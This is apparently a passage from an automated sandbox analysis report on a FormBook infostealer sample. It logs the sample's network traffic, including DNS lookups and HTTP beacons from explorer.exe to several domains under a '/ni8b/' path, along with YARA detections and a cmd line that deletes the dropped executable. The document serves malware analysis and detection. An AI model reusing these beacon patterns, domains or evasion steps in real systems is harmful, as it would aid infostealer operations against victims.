                                                          Oct 13, 2021 20:35:37.628043890 CEST4981580192.168.2.452.5.157.71
                                                          Oct 13, 2021 20:35:37.628125906 CEST4981580192.168.2.452.5.157.71
                                                          Oct 13, 2021 20:35:37.766328096 CEST804981552.5.157.71192.168.2.4
                                                          Oct 13, 2021 20:35:42.751701117 CEST4981780192.168.2.467.205.83.103
                                                          Oct 13, 2021 20:35:42.859648943 CEST804981767.205.83.103192.168.2.4
                                                          Oct 13, 2021 20:35:42.859788895 CEST4981780192.168.2.467.205.83.103
                                                          Oct 13, 2021 20:35:42.859961987 CEST4981780192.168.2.467.205.83.103
                                                          Oct 13, 2021 20:35:42.967464924 CEST804981767.205.83.103192.168.2.4
                                                          Oct 13, 2021 20:35:42.967576981 CEST804981767.205.83.103192.168.2.4
                                                          Oct 13, 2021 20:35:42.967592001 CEST804981767.205.83.103192.168.2.4
                                                          Oct 13, 2021 20:35:42.969031096 CEST4981780192.168.2.467.205.83.103
                                                          Oct 13, 2021 20:35:42.969053984 CEST4981780192.168.2.467.205.83.103
                                                          Oct 13, 2021 20:35:43.076829910 CEST804981767.205.83.103192.168.2.4
                                                          Oct 13, 2021 20:35:48.147773027 CEST4982380192.168.2.4148.72.177.185
                                                          Oct 13, 2021 20:35:48.293035984 CEST8049823148.72.177.185192.168.2.4
                                                          Oct 13, 2021 20:35:48.293538094 CEST4982380192.168.2.4148.72.177.185
                                                          Oct 13, 2021 20:35:48.294147968 CEST4982380192.168.2.4148.72.177.185
                                                          Oct 13, 2021 20:35:48.439049959 CEST8049823148.72.177.185192.168.2.4
                                                          Oct 13, 2021 20:35:48.441919088 CEST8049823148.72.177.185192.168.2.4
                                                          Oct 13, 2021 20:35:48.441946983 CEST8049823148.72.177.185192.168.2.4
                                                          Oct 13, 2021 20:35:48.442298889 CEST4982380192.168.2.4148.72.177.185
                                                          Oct 13, 2021 20:35:48.442377090 CEST4982380192.168.2.4148.72.177.185
                                                          Oct 13, 2021 20:35:58.896271944 CEST4983180192.168.2.4216.10.241.4
                                                          Oct 13, 2021 20:35:59.037774086 CEST8049831216.10.241.4192.168.2.4
                                                          Oct 13, 2021 20:35:59.037929058 CEST4983180192.168.2.4216.10.241.4
                                                          Oct 13, 2021 20:35:59.038064003 CEST4983180192.168.2.4216.10.241.4
                                                          Oct 13, 2021 20:35:59.178782940 CEST8049831216.10.241.4192.168.2.4
                                                          Oct 13, 2021 20:35:59.539577961 CEST4983180192.168.2.4216.10.241.4
                                                          Oct 13, 2021 20:35:59.721340895 CEST8049831216.10.241.4192.168.2.4
                                                          Oct 13, 2021 20:36:00.009967089 CEST8049831216.10.241.4192.168.2.4
                                                          Oct 13, 2021 20:36:00.010011911 CEST8049831216.10.241.4192.168.2.4
                                                          Oct 13, 2021 20:36:00.010154963 CEST4983180192.168.2.4216.10.241.4
                                                          Oct 13, 2021 20:36:00.010214090 CEST4983180192.168.2.4216.10.241.4
                                                          Oct 13, 2021 20:36:09.650628090 CEST4983380192.168.2.4213.186.33.5
                                                          Oct 13, 2021 20:36:09.675570011 CEST8049833213.186.33.5192.168.2.4
                                                          Oct 13, 2021 20:36:09.675734997 CEST4983380192.168.2.4213.186.33.5
                                                          Oct 13, 2021 20:36:09.675868034 CEST4983380192.168.2.4213.186.33.5
                                                          Oct 13, 2021 20:36:09.701060057 CEST8049833213.186.33.5192.168.2.4
                                                          Oct 13, 2021 20:36:09.701281071 CEST8049833213.186.33.5192.168.2.4
                                                          Oct 13, 2021 20:36:09.701363087 CEST4983380192.168.2.4213.186.33.5
                                                          Oct 13, 2021 20:36:09.701405048 CEST4983380192.168.2.4213.186.33.5
                                                          Oct 13, 2021 20:36:09.726133108 CEST8049833213.186.33.5192.168.2.4
                                                          Oct 13, 2021 20:36:14.859260082 CEST4985180192.168.2.431.170.167.144
                                                          Oct 13, 2021 20:36:15.000027895 CEST804985131.170.167.144192.168.2.4
                                                          Oct 13, 2021 20:36:15.000226974 CEST4985180192.168.2.431.170.167.144
                                                          Oct 13, 2021 20:36:15.000571966 CEST4985180192.168.2.431.170.167.144
                                                          Oct 13, 2021 20:36:15.141258001 CEST804985131.170.167.144192.168.2.4
                                                          Oct 13, 2021 20:36:15.397768974 CEST804985131.170.167.144192.168.2.4
                                                          Oct 13, 2021 20:36:15.398262024 CEST804985131.170.167.144192.168.2.4
                                                          Oct 13, 2021 20:36:15.398339987 CEST4985180192.168.2.431.170.167.144
                                                          Oct 13, 2021 20:36:15.398375034 CEST4985180192.168.2.431.170.167.144
                                                          Oct 13, 2021 20:36:15.538866043 CEST804985131.170.167.144192.168.2.4

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Oct 13, 2021 20:35:31.118007898 CEST5275253192.168.2.48.8.8.8
                                                          Oct 13, 2021 20:35:31.431078911 CEST53527528.8.8.8192.168.2.4
                                                          Oct 13, 2021 20:35:37.261835098 CEST6054253192.168.2.48.8.8.8
                                                          Oct 13, 2021 20:35:37.317528009 CEST53605428.8.8.8192.168.2.4
                                                          Oct 13, 2021 20:35:42.638209105 CEST6068953192.168.2.48.8.8.8
                                                          Oct 13, 2021 20:35:42.748863935 CEST53606898.8.8.8192.168.2.4
                                                          Oct 13, 2021 20:35:48.010533094 CEST6420653192.168.2.48.8.8.8
                                                          Oct 13, 2021 20:35:48.146205902 CEST53642068.8.8.8192.168.2.4
                                                          Oct 13, 2021 20:35:53.450046062 CEST5090453192.168.2.48.8.8.8
                                                          Oct 13, 2021 20:35:53.479887962 CEST53509048.8.8.8192.168.2.4
                                                          Oct 13, 2021 20:35:58.509708881 CEST5752553192.168.2.48.8.8.8
                                                          Oct 13, 2021 20:35:58.894642115 CEST53575258.8.8.8192.168.2.4
                                                          Oct 13, 2021 20:36:09.603306055 CEST5341853192.168.2.48.8.8.8
                                                          Oct 13, 2021 20:36:09.648792982 CEST53534188.8.8.8192.168.2.4
                                                          Oct 13, 2021 20:36:14.717250109 CEST5926053192.168.2.48.8.8.8
                                                          Oct 13, 2021 20:36:14.855338097 CEST53592608.8.8.8192.168.2.4
                                                          Oct 13, 2021 20:36:20.411690950 CEST4994453192.168.2.48.8.8.8
                                                          Oct 13, 2021 20:36:20.434771061 CEST53499448.8.8.8192.168.2.4
                                                          Oct 13, 2021 20:36:25.451200962 CEST6330053192.168.2.48.8.8.8
                                                          Oct 13, 2021 20:36:25.485270977 CEST53633008.8.8.8192.168.2.4
                                                          Oct 13, 2021 20:36:30.845546007 CEST6144953192.168.2.48.8.8.8
                                                          Oct 13, 2021 20:36:30.966455936 CEST53614498.8.8.8192.168.2.4

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                          Oct 13, 2021 20:35:31.118007898 CEST192.168.2.48.8.8.80x5ef5Standard query (0)www.nhmingwei.comA (IP address)IN (0x0001)
                                                          Oct 13, 2021 20:35:37.261835098 CEST192.168.2.48.8.8.80xb2d8Standard query (0)www.celltecstore.comA (IP address)IN (0x0001)
                                                          Oct 13, 2021 20:35:42.638209105 CEST192.168.2.48.8.8.80xc530Standard query (0)www.ps-sac.comA (IP address)IN (0x0001)
                                                          Oct 13, 2021 20:35:48.010533094 CEST192.168.2.48.8.8.80xe23Standard query (0)www.txsports.clubA (IP address)IN (0x0001)
                                                          Oct 13, 2021 20:35:53.450046062 CEST192.168.2.48.8.8.80xa587Standard query (0)www.ville-fogalmam.comA (IP address)IN (0x0001)
                                                          Oct 13, 2021 20:35:58.509708881 CEST192.168.2.48.8.8.80xd63dStandard query (0)www.rajinderbeas.comA (IP address)IN (0x0001)
                                                          Oct 13, 2021 20:36:09.603306055 CEST192.168.2.48.8.8.80xfbeeStandard query (0)www.box-770.comA (IP address)IN (0x0001)
                                                          Oct 13, 2021 20:36:14.717250109 CEST192.168.2.48.8.8.80xb48cStandard query (0)www.thecrystalconsciousness.comA (IP address)IN (0x0001)
                                                          Oct 13, 2021 20:36:20.411690950 CEST192.168.2.48.8.8.80x707aStandard query (0)www.eastsidescooters.comA (IP address)IN (0x0001)
                                                          Oct 13, 2021 20:36:25.451200962 CEST192.168.2.48.8.8.80x9122Standard query (0)www.serviciosgeneralesjba.onlineA (IP address)IN (0x0001)
                                                          Oct 13, 2021 20:36:30.845546007 CEST192.168.2.48.8.8.80x3843Standard query (0)www.sapphiremodule.comA (IP address)IN (0x0001)

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                          Oct 13, 2021 20:35:31.431078911 CEST8.8.8.8192.168.2.40x5ef5No error (0)www.nhmingwei.com154.208.173.144A (IP address)IN (0x0001)
                                                          Oct 13, 2021 20:35:37.317528009 CEST8.8.8.8192.168.2.40xb2d8No error (0)www.celltecstore.comcelltec4.mitiendanube.comCNAME (Canonical name)IN (0x0001)
                                                          Oct 13, 2021 20:35:37.317528009 CEST8.8.8.8192.168.2.40xb2d8No error (0)celltec4.mitiendanube.commitiendanube.comCNAME (Canonical name)IN (0x0001)
                                                          Oct 13, 2021 20:35:37.317528009 CEST8.8.8.8192.168.2.40xb2d8No error (0)mitiendanube.com52.5.157.71A (IP address)IN (0x0001)
                                                          Oct 13, 2021 20:35:37.317528009 CEST8.8.8.8192.168.2.40xb2d8No error (0)mitiendanube.com52.206.238.9A (IP address)IN (0x0001)
                                                          Oct 13, 2021 20:35:37.317528009 CEST8.8.8.8192.168.2.40xb2d8No error (0)mitiendanube.com52.200.197.31A (IP address)IN (0x0001)
                                                          Oct 13, 2021 20:35:42.748863935 CEST8.8.8.8192.168.2.40xc530No error (0)www.ps-sac.comps-sac.comCNAME (Canonical name)IN (0x0001)
                                                          Oct 13, 2021 20:35:42.748863935 CEST8.8.8.8192.168.2.40xc530No error (0)ps-sac.com67.205.83.103A (IP address)IN (0x0001)
                                                          Oct 13, 2021 20:35:48.146205902 CEST8.8.8.8192.168.2.40xe23No error (0)www.txsports.clubtxsports.clubCNAME (Canonical name)IN (0x0001)
                                                          Oct 13, 2021 20:35:48.146205902 CEST8.8.8.8192.168.2.40xe23No error (0)txsports.club148.72.177.185A (IP address)IN (0x0001)
                                                          Oct 13, 2021 20:35:53.479887962 CEST8.8.8.8192.168.2.40xa587Name error (3)www.ville-fogalmam.comnonenoneA (IP address)IN (0x0001)
                                                          Oct 13, 2021 20:35:58.894642115 CEST8.8.8.8192.168.2.40xd63dNo error (0)www.rajinderbeas.comrajinderbeas.comCNAME (Canonical name)IN (0x0001)
                                                          Oct 13, 2021 20:35:58.894642115 CEST8.8.8.8192.168.2.40xd63dNo error (0)rajinderbeas.com216.10.241.4A (IP address)IN (0x0001)
                                                          Oct 13, 2021 20:36:09.648792982 CEST8.8.8.8192.168.2.40xfbeeNo error (0)www.box-770.com213.186.33.5A (IP address)IN (0x0001)
                                                          Oct 13, 2021 20:36:14.855338097 CEST8.8.8.8192.168.2.40xb48cNo error (0)www.thecrystalconsciousness.comthecrystalconsciousness.comCNAME (Canonical name)IN (0x0001)
                                                          Oct 13, 2021 20:36:14.855338097 CEST8.8.8.8192.168.2.40xb48cNo error (0)thecrystalconsciousness.com31.170.167.144A (IP address)IN (0x0001)
                                                          Oct 13, 2021 20:36:20.434771061 CEST8.8.8.8192.168.2.40x707aName error (3)www.eastsidescooters.comnonenoneA (IP address)IN (0x0001)
                                                          Oct 13, 2021 20:36:25.485270977 CEST8.8.8.8192.168.2.40x9122No error (0)www.serviciosgeneralesjba.onlineserviciosgeneralesjba.onlineCNAME (Canonical name)IN (0x0001)
                                                          Oct 13, 2021 20:36:25.485270977 CEST8.8.8.8192.168.2.40x9122No error (0)serviciosgeneralesjba.online68.65.120.219A (IP address)IN (0x0001)
                                                          Oct 13, 2021 20:36:30.966455936 CEST8.8.8.8192.168.2.40x3843No error (0)www.sapphiremodule.com44.227.65.245A (IP address)IN (0x0001)
                                                          Oct 13, 2021 20:36:30.966455936 CEST8.8.8.8192.168.2.40x3843No error (0)www.sapphiremodule.com44.227.76.166A (IP address)IN (0x0001)

                                                          HTTP Request Dependency Graph

                                                          • www.nhmingwei.com
                                                          • www.celltecstore.com
                                                          • www.ps-sac.com
                                                          • www.txsports.club
                                                          • www.rajinderbeas.com
                                                          • www.box-770.com
                                                          • www.thecrystalconsciousness.com

                                                          HTTP Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          0192.168.2.449811154.208.173.14480C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Oct 13, 2021 20:35:31.965432882 CEST2577OUTGET /ni8b/?ZfEhPp=bnsPHpJ0JXfYedDeyyRM0T59hyvcJozMf52DwVsUkht3MP5YfvQl77Z8cLzJCfxgsHVQ&kTY=TdZdU HTTP/1.1
                                                          Host: www.nhmingwei.com
                                                          Connection: close
                                                          Data Raw: 00 00 00 00 00 00 00
                                                          Data Ascii:


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          1192.168.2.44981552.5.157.7180C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Oct 13, 2021 20:35:37.474766970 CEST5272OUTGET /ni8b/?ZfEhPp=Zvg5mbxlh1FEUeAb4a18wQGVMNqECI22VVMpQ/dBRbKZgYLiDL5+JoutiYtpnsrAj+vq&kTY=TdZdU HTTP/1.1
                                                          Host: www.celltecstore.com
                                                          Connection: close
                                                          Data Raw: 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          Oct 13, 2021 20:35:37.627887964 CEST5272INHTTP/1.1 301 Moved Permanently
                                                          content-length: 0
                                                          location: https://www.celltecstore.com/ni8b/?ZfEhPp=Zvg5mbxlh1FEUeAb4a18wQGVMNqECI22VVMpQ/dBRbKZgYLiDL5+JoutiYtpnsrAj+vq&kTY=TdZdU
                                                          connection: close


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          2192.168.2.44981767.205.83.10380C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Oct 13, 2021 20:35:42.859961987 CEST5847OUTGET /ni8b/?ZfEhPp=Eseu83Nj43qLBMj7MwWHNBqOzdwc7j/6ub3THp3k2Y03CkKraCnGH8IbXpARdpoCPKFf&kTY=TdZdU HTTP/1.1
                                                          Host: www.ps-sac.com
                                                          Connection: close
                                                          Data Raw: 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          Oct 13, 2021 20:35:42.967576981 CEST5847INHTTP/1.1 301 Moved Permanently
                                                          Server: nginx
                                                          Date: Wed, 13 Oct 2021 18:35:42 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 162
                                                          Connection: close
                                                          Location: https://www.ps-sac.com/ni8b/?ZfEhPp=Eseu83Nj43qLBMj7MwWHNBqOzdwc7j/6ub3THp3k2Y03CkKraCnGH8IbXpARdpoCPKFf&kTY=TdZdU
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          3192.168.2.449823148.72.177.18580C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Oct 13, 2021 20:35:48.294147968 CEST5859OUTGET /ni8b/?ZfEhPp=lGGQ0sEZ2PLdmlcqvZgUhQs2XHM9QQiXiItD8ZWi5Y/Bd+WpsK3C+f5erJECmSl9JpeM&kTY=TdZdU HTTP/1.1
                                                          Host: www.txsports.club
                                                          Connection: close
                                                          Data Raw: 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          Oct 13, 2021 20:35:48.441919088 CEST5861INHTTP/1.1 301 Moved Permanently
                                                          Server: nginx/1.21.3
                                                          Date: Wed, 13 Oct 2021 18:35:48 GMT
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Content-Length: 334
                                                          Connection: close
                                                          Location: http://www.txsports.club/public/ni8b?ZfEhPp=lGGQ0sEZ2PLdmlcqvZgUhQs2XHM9QQiXiItD8ZWi5Y/Bd+WpsK3C+f5erJECmSl9JpeM&kTY=TdZdU


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          4192.168.2.449831216.10.241.480C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Oct 13, 2021 20:35:59.038064003 CEST5878OUTGET /ni8b/?ZfEhPp=NtJPN2JufTPSUZxhVG2lwHAXNu/91wCxk6QRP91Jym6+DWJgifkFBuY1HfUXqRvRWjoF&kTY=TdZdU HTTP/1.1
                                                          Host: www.rajinderbeas.com
                                                          Connection: close
                                                          Data Raw: 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          Oct 13, 2021 20:36:00.009967089 CEST5879INHTTP/1.1 301 Moved Permanently
                                                          Date: Wed, 13 Oct 2021 18:35:59 GMT
                                                          Server: nginx/1.17.6
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 0
                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                          X-Redirect-By: WordPress
                                                          Location: http://rajinderbeas.com/ni8b/?ZfEhPp=NtJPN2JufTPSUZxhVG2lwHAXNu/91wCxk6QRP91Jym6+DWJgifkFBuY1HfUXqRvRWjoF&kTY=TdZdU
                                                          X-Endurance-Cache-Level: 2
                                                          X-nginx-cache: WordPress
                                                          X-Server-Cache: true
                                                          X-Proxy-Cache: MISS


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          5192.168.2.449833213.186.33.580C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Oct 13, 2021 20:36:09.675868034 CEST5885OUTGET /ni8b/?ZfEhPp=5gklYs16rcBoTPwexQgZaEg2WcCOIBmXVnGtPO+7DRUqV3YS52r/gKUkKnDwsfv+vOIy&kTY=TdZdU HTTP/1.1
                                                          Host: www.box-770.com
                                                          Connection: close
                                                          Data Raw: 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          Oct 13, 2021 20:36:09.701060057 CEST5888INHTTP/1.1 302 Moved Temporarily
                                                          server: nginx
                                                          date: Wed, 13 Oct 2021 18:36:09 GMT
                                                          content-type: text/html
                                                          content-length: 138
                                                          location: http://www.box-770.com
                                                          x-iplb-request-id: 66818F21:C2A9_D5BA2105:0050_61672719_16AC109C:2FC1
                                                          x-iplb-instance: 16978
                                                          set-cookie: SERVERID77446=2001710|YWcnH|YWcnH; path=/; HttpOnly
                                                          connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          6192.168.2.44985131.170.167.14480C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Oct 13, 2021 20:36:15.000571966 CEST5935OUTGET /ni8b/?ZfEhPp=JVySAPp733wZmQfNstMcOnNrXbLvf0xUB0jZ2Inh4UzmMU775P3StTy/F8q5n6jJiQm6&kTY=TdZdU HTTP/1.1
                                                          Host: www.thecrystalconsciousness.com
                                                          Connection: close
                                                          Data Raw: 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          Oct 13, 2021 20:36:15.397768974 CEST5938INHTTP/1.1 301 Moved Permanently
                                                          Connection: close
                                                          x-powered-by: PHP/7.4.16
                                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          cache-control: no-cache, must-revalidate, max-age=0
                                                          content-type: text/html; charset=UTF-8
                                                          x-redirect-by: WordPress
                                                          location: http://thecrystalconsciousness.com/ni8b/?ZfEhPp=JVySAPp733wZmQfNstMcOnNrXbLvf0xUB0jZ2Inh4UzmMU775P3StTy/F8q5n6jJiQm6&kTY=TdZdU
                                                          x-litespeed-cache: miss
                                                          content-length: 0
                                                          date: Wed, 13 Oct 2021 18:36:15 GMT
                                                          server: LiteSpeed


                                                          Code Manipulations

                                                          Statistics

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Start time:20:34:25
                                                          Start date:13/10/2021
                                                          Path:C:\Users\user\Desktop\56460021473877.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:'C:\Users\user\Desktop\56460021473877.exe'
                                                          Imagebase:0x40000
                                                          File size:569856 bytes
                                                          MD5 hash:D95E9BB2FA064A984C391B5BFC1D01E6
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.695508447.00000000033A9000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.695508447.00000000033A9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.695508447.00000000033A9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.694839132.00000000023A1000.00000004.00000001.sdmp, Author: Joe Security
                                                          Reputation:low

                                                          General

                                                          Start time:20:34:34
                                                          Start date:13/10/2021
                                                          Path:C:\Users\user\Desktop\56460021473877.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\Desktop\56460021473877.exe
                                                          Imagebase:0xba0000
                                                          File size:569856 bytes
                                                          MD5 hash:D95E9BB2FA064A984C391B5BFC1D01E6
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.763748004.00000000015D0000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.763748004.00000000015D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.763748004.00000000015D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.762828125.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.762828125.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.762828125.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.763621485.00000000011C0000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.763621485.00000000011C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.763621485.00000000011C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          Reputation:low

                                                          General

                                                          Start time:20:34:35
                                                          Start date:13/10/2021
                                                          Path:C:\Windows\explorer.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Explorer.EXE
                                                          Imagebase:0x7ff6fee60000
                                                          File size:3933184 bytes
                                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.752209654.000000000EEF1000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.752209654.000000000EEF1000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.752209654.000000000EEF1000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.730886485.000000000EEF1000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.730886485.000000000EEF1000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.730886485.000000000EEF1000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          Reputation:high

                                                          General

                                                          Start time:20:35:03
                                                          Start date:13/10/2021
                                                          Path:C:\Windows\SysWOW64\control.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\SysWOW64\control.exe
                                                          Imagebase:0x2f0000
                                                          File size:114688 bytes
                                                          MD5 hash:40FBA3FBFD5E33E0DE1BA45472FDA66F
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.940519272.0000000002830000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.940519272.0000000002830000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.940519272.0000000002830000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.940364992.0000000002530000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.940364992.0000000002530000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.940364992.0000000002530000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.939915779.0000000000500000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.939915779.0000000000500000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.939915779.0000000000500000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                          Reputation:moderate

                                                          General

                                                          Start time:20:35:08
                                                          Start date:13/10/2021
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:/c del 'C:\Users\user\Desktop\56460021473877.exe'
                                                          Imagebase:0x11d0000
                                                          File size:232960 bytes
                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Start time:20:35:09
                                                          Start date:13/10/2021
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff724c50000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          Disassembly

                                                          Code Analysis

                                                          Reset < >